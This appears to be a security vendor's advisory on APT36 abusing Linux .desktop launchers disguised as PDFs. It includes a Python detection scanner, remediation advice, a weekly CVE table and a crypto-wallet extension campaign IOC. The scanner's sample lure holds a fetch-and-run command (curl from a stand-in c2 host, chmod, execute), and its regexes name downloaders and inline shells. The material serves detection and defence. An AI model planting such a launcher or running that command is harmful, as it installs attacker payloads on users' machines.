APT36 hackers abuse Linux .desktop files to install malware in new attacks (CVSS: 8.2 to 8.6, High)

Information
APT36, also known as Transparent Tribe, is a Pakistan-based threat group that has modernized its capabilities and now targets Linux systems, in particular BOSS Linux, the distribution used by the Indian government in critical institutions such as security agencies and various ministries. The group has relied on zero-day exploitation and on lesser-known deception techniques to evade detection and keep long-term access to compromised systems. Recent reports describe it abusing Linux .desktop files to deliver malware inside Indian security organizations. This marks a shift from its earlier Windows-centric tooling toward Linux, widening its reach and raising its chance of success.
Incident
In 2025, APT36, a Pakistan-based cyber-espionage group, abused .desktop files on Linux to deliver malware and gain a foothold inside Indian government and security organizations. The lure was a phishing email carrying a ZIP archive; inside was a .desktop file disguised as a PDF document, counting on the victim to double-click it. When the file is opened, commands hidden in the launcher's Exec= line (which the desktop environment runs on launch) instruct the system to download an ELF payload and execute it. The payload embeds itself quietly and configures the .desktop file to run automatically at every user login, giving the malware long-lived persistence on the host. The malware then communicates with its command-and-control server over WebSocket to exfiltrate data and receive operator commands.
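The chain above is straightforward to audit for, because everything hinges on the launcher's Exec= line and on where the file sits. The scanner below is an added example written for this page, not code from the original article or from any vendor report. It parses a .desktop file (an INI-like format), flags Exec= lines that download or stage a payload, names that masquerade as documents, double extensions such as .pdf.desktop, and files placed in the autostart directories. The two sample launchers, the c2.example.invalid host and the /tmp paths are constructed for the example and are not APT36 indicators. It goes a little beyond the single PDF lure described above by also catching .doc/.xls/.ppt lures and both curl and wget downloaders.

```python
"""Heuristic scanner for booby-trapped Linux .desktop launchers.

Added example (not code from the page or any vendor). It models the chain
described above: a launcher named and iconed like a PDF, an Exec= line that
fetches an ELF payload and runs it, and a copy in ~/.config/autostart so it
runs at every login. Sample launchers below are constructed, not real artefacts.
"""
import configparser
import re
from pathlib import Path

# Indicators in an Exec= line that are rarely legitimate for a "document" launcher.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
INLINE_SHELL_RE = re.compile(r"\b(ba|z|da)?sh\s+-c\b|\|\s*(ba|z|da)?sh\b")
STAGING_RE = re.compile(r"chmod\s+\+x|/tmp/|/dev/shm/|\$HOME/\.|~/\.")
DOC_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)
AUTOSTART_DIRS = ("/.config/autostart/", "/etc/xdg/autostart/")


def parse_desktop(text):
    """Return the [Desktop Entry] group of a .desktop file as a dict.

    The format is INI-like with case-sensitive keys; RawConfigParser does no
    interpolation, so '%U'-style placeholders survive. Unparseable input or a
    missing group yields {} so the caller treats it as 'nothing found'.
    """
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case: "Exec", not "exec"
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))


def assess(entry, path=None):
    """Findings for one parsed entry; an empty list means nothing looked odd."""
    findings = []
    exec_line = entry.get("Exec", "")
    if DOWNLOAD_RE.search(exec_line):
        findings.append("Exec downloads content (curl/wget)")
    if INLINE_SHELL_RE.search(exec_line):
        findings.append("Exec runs an inline shell command")
    if STAGING_RE.search(exec_line):
        findings.append("Exec stages or runs a file from a writable or hidden path")
    if DOC_EXT_RE.search(entry.get("Name", "").strip()):
        findings.append("Name masquerades as a document")
    if path is not None:
        p = Path(path)
        if DOUBLE_EXT_RE.search(p.name):
            findings.append("double extension (<doc>.desktop) in file name")
        if any(d in p.as_posix() for d in AUTOSTART_DIRS):
            findings.append("lives in an autostart directory (runs at login)")
    # Only meaningful in combination: a silent launcher that does odd things.
    if findings and entry.get("Terminal", "false").strip().lower() != "true":
        findings.append("Terminal=false, so nothing is shown to the user")
    return findings


def scan_text(text, path=None):
    """Parse and assess a launcher given as text; path feeds the name/location checks."""
    return assess(parse_desktop(text), path)


def scan_autostart(home=None):
    """Audit the usual per-user and system autostart directories on this host."""
    home = Path.home() if home is None else Path(home)
    hits = {}
    for d in (home / ".config" / "autostart", Path("/etc/xdg/autostart")):
        if not d.is_dir():
            continue
        for f in d.glob("*.desktop"):
            findings = scan_text(f.read_text(errors="replace"), f)
            if findings:
                hits[str(f)] = findings
    return hits


# Constructed samples (not real artefacts): a normal launcher and one modelled
# on the described lure. The host name uses the reserved .invalid TLD.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
Terminal=false
"""

LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s http://c2.example.invalid/p -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
"""

if __name__ == "__main__":
    print("benign:", scan_text(BENIGN, "/usr/share/applications/editor.desktop"))
    print("lure:", scan_text(LURE, "/home/user/.config/autostart/Meeting_Notes.pdf.desktop"))
    print("host autostart audit:", scan_autostart())
```

Run it as a normal user to audit your own autostart directory; the heuristics are deliberately loud (a legitimate launcher that calls curl from /tmp will be flagged) because a .desktop file that does any of this deserves a look. Pair it with a mail-gateway rule that treats .desktop entries inside archives as executables.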
Remediation Steps
Linux endpoints need the same security coverage and monitoring as the Windows estate. For this campaign specifically: treat .desktop files arriving by email or inside archives as executables rather than documents (a file named something.pdf.desktop is a launcher, not a PDF) and block or quarantine them at the mail gateway; audit ~/.config/autostart and /etc/xdg/autostart for launchers you did not install, especially any whose Exec= line downloads and runs a file; and alert on desktop-session processes opening outbound WebSocket connections to unknown hosts.
For more information please contact
Email: sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
061 387 9439 (Ms.Sirilak)
092 257 6902 (Ms.Narusorn)
063 197 7510 (Mr.Yanotai)
065 725 7405 (Ms.Chanuntida)
065 725 7405 (Ms.Nattharini)
Reference
Weekly Interesting CVE

| NO. | CVE Name | Published Date (d/m/yyyy) | Last Update (d/m/yyyy) | Device/Application/OS Target | Attack Type | CVSS | Detail | Solution | Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 | CVE-2025-25256 | 12/8/2025 | 16/8/2025 | Fortinet FortiSIEM | Remote Code Execution (RCE) | 9.8 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSIEM versions 7.3.0 through 7.3.1, 7.2.0 through 7.2.5, 7.1.0 through 7.1.7, 7.0.0 through 7.0.3 and before 6.7.9 allows an unauthenticated attacker to execute unauthorized code or commands via crafted CLI requests. | Update FortiSIEM to a fixed release. | |
| 2 | CVE-2025-53779 | 12/8/2025 | 15/8/2025 | Windows Kerberos | Elevation of Privilege (EoP) | 7.2 | Relative path traversal in Windows Kerberos allows an authorized attacker to elevate privileges over a network. | Install the Microsoft security updates from the August 2025 Patch Tuesday. | |
| 3 | CVE-2025-54948 | 5/8/2025 | 13/8/2025 | Trend Micro Apex One (on-premise) | Remote Code Execution (RCE) | 9.4 | A vulnerability in the Trend Micro Apex One (on-premise) management console could allow a pre-authenticated remote attacker to upload malicious code and execute commands on affected installations. | Apex One customers should install the patches and hotfixes released by Trend Micro immediately. | https://app.opencve.io/cve/CVE-2025-54948 |
| 4 | CVE-2025-47206 | 18/8/2025 | 18/8/2025 | QNAP File Station 5 | Out-of-bounds write | 7.1 | An out-of-bounds write vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to modify or corrupt memory. | Fixed in File Station 5 5.5.6.4933 and later. | |
| 5 | CVE-2025-8088 | 8/8/2025 | 15/8/2025 | WinRAR (Windows version) | Code Execution (CE) | 8.4 | A path traversal vulnerability affecting the Windows version of WinRAR allows attackers to execute arbitrary code by crafting malicious archive files. | Fixed in WinRAR 7.12. | https://app.opencve.io/cve/CVE-2025-8088 |
Malware News or Campaign IOC/IOA

| No | Campaign Name | Detection Date (d/m/yyyy) | Attack Type | Description | Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 | Bogus Firefox crypto wallet extensions pilfer more than $1M | 11/08/2025 | Extension Hollowing | A sophisticated, large-scale cybercrime campaign named GreedyBear has been exposed stealing at least a million dollars from cryptocurrency users, according to research by the cybersecurity firm Koi Security. One of GreedyBear's main delivery channels is malicious browser extensions: the group has published over 150 fake extensions on the Firefox marketplace impersonating popular crypto wallets such as MetaMask. A key detail from Koi Security's research is that all of these attacks (the fake extensions, the malware and the scam websites) are tied to a single central server, 185.208.156.66, which lets the attackers manage the operation efficiently. | Block and alert on traffic to 185.208.156.66; remove wallet extensions that were not published by the wallet vendor's official account. |

Ref: https://www.scworld.com/brief/bogus-firefox-crypto-wallet-extensions-pilfer-more-than-1m
26 August 2025